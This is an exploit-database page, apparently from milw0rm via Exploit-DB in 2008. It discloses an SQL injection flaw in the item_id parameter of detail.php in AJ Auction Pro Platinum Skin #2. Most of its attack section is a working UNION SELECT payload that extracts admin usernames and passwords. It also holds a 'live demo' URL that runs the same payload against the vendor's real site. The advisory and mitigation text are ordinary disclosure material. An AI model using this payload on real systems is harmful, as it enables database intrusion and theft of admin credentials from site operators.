header-logo
Suggest Exploit
vendor:
AJ Auction Pro Platinum Skin #2
by:
milw0rm.com
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: AJ Auction Pro Platinum Skin #2
Affected Version From: Prior to AJ Auction Pro Platinum Skin #2 2.0.2.
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability

AJ Auction Pro Platinum Skin #2 is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. This issue affects versions prior to AJ Auction Pro Platinum Skin #2 2.0.2.

Mitigation:

Users should upgrade to the latest version of AJ Auction Pro Platinum Skin #2 2.0.2.
Source

Exploit-DB raw data:

############################################################################################
## AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability
## POC :
##       /detail.php?item_id=-1+UNION+SELECT+1,2,3,4,concat(user_name,0x3a,password),
##       6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
##       ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+admin--
## Live Demo :
##    http://www.ajauctionpro.com/ajauction_platinum2/detail.php?item_id=-1+UNION+SELECT+1,2,3,4
##    ,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19
##    ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42
##    ,43,44,45,46,47,48,49,50,51+from+admin--
############################################################################################

# milw0rm.com [2008-09-24]